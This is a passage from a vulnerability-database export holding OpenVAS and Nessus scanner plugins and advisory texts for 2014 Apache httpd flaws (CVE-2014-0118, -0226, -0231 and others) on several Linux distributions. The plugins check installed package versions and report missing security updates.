script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for apache2 USN-2299-1\");\n\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"insight\", value:\"Marek Kroemeke discovered that the mod_proxy module incorrectly\nhandled certain requests. A remote attacker could use this issue to cause the\nserver to stop responding, leading to a denial of service. This issue only\naffected Ubuntu 14.04 LTS. (CVE-2014-0117)\n\nGiancarlo Pellegrino and Davide Balzarotti discovered that the mod_deflate\nmodule incorrectly handled body decompression. A remote attacker could use\nthis issue to cause resource consumption, leading to a denial of service.\n(CVE-2014-0118)\n\nMarek Kroemeke and others discovered that the mod_status module incorrectly\nhandled certain requests. A remote attacker could use this issue to cause\nthe server to stop responding, leading to a denial of service, or possibly\nexecute arbitrary code. (CVE-2014-0226)\n\nRainer Jung discovered that the mod_cgid module incorrectly handled certain\nscripts. A remote attacker could use this issue to cause the server to stop\nresponding, leading to a denial of service. (CVE-2014-0231)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2299-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2299-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.7-1ubuntu4.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-1ubuntu1.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.14-5ubuntu8.14\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:27:29", "bulletinFamily": "scanner", "description": "This host is installed with Apache HTTP Server\n and is prone to denial of service vulnerability.", "modified": "2019-07-05T00:00:00", "published": "2015-05-27T00:00:00", "id": "OPENVAS:1361412562310805638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805638", "title": "Apache HTTP Server Multiple Vulnerabilities May15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache HTTP Server Multiple Vulnerabilities May15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805638\");\n script_version(\"2019-07-05T09:54:18+0000\");\n script_cve_id(\"CVE-2014-3523\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(73040);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:54:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 12:15:46 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); # Only vulnerable if mod_lua/mod_deflate/mod_status/mod_cgid is enabled\n script_name(\"Apache HTTP Server Multiple Vulnerabilities May15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache HTTP Server\n and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Vulnerability in the WinNT MPM component within the 'winnt_accept' function\n in server/mpm/winnt/child.c script that is triggered when the default\n AcceptFilter is used.\n\n - Vulnerability in the mod_deflate module that is triggered when handling\n highly compressed bodies.\n\n - A race condition in the mod_status module that is triggered as user-supplied\n input is not properly validated when handling the scoreboard.\n\n - Vulnerability in the mod_cgid module that is triggered when used to host CGI\n scripts that do not consume standard input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attackers to bypass intended access restrictions in opportunistic\n circumstances by leveraging multiple Require directives.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP Server version before 2.4.10.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.4.10 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_xref(name:\"URL\", value:\"http://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2014-8109\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_mandatory_keys(\"apache/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!httpd_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!httpd_ver = get_app_version(cpe:CPE, port:httpd_port)){\n exit(0);\n}\n\nif(version_in_range(version:httpd_ver, test_version:\"2.4.1\", test_version2:\"2.4.9\"))\n{\n report = 'Installed version: ' + httpd_ver + '\\n' +\n 'Fixed version: ' + \"2.4.10\" + '\\n';\n security_message(data:report, port:httpd_port);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-02-21T01:22:08", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix three security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the 'DEFLATE' input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76715", "published": "2014-07-24T00:00:00", "title": "CentOS 5 / 6 : httpd (CESA-2014:0920)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0920 and \n# CentOS Errata and Security Advisory 2014:0920 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76715);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/10 11:49:31\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"CentOS 5 / 6 : httpd (CESA-2014:0920)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-July/020440.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd7ee438\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-July/020441.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d737081a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-devel-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-manual-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mod_ssl-2.2.3-87.el5.centos\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-devel-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-manual-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-tools-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mod_ssl-2.2.15-31.el6.centos\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:32", "bulletinFamily": "scanner", "description": "A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the 'DEFLATE' input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)", "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2014-388.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78331", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2014-388)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-388.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78331);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"ALAS\", value:\"2014-388\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2014-388)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-388.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.27-1.3.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.27-1.3.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:09", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2014:0920 :\n\nUpdated httpd packages that fix three security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the 'DEFLATE' input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76744", "published": "2014-07-24T00:00:00", "title": "Oracle Linux 5 / 6 : httpd (ELSA-2014-0920)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0920 and \n# Oracle Linux Security Advisory ELSA-2014-0920 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76744);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/18 17:43:57\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"Oracle Linux 5 / 6 : httpd (ELSA-2014-0920)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0920 :\n\nUpdated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004243.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004246.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-87.0.1.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-87.0.1.el5_10\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-31.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-31.0.1.el6_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 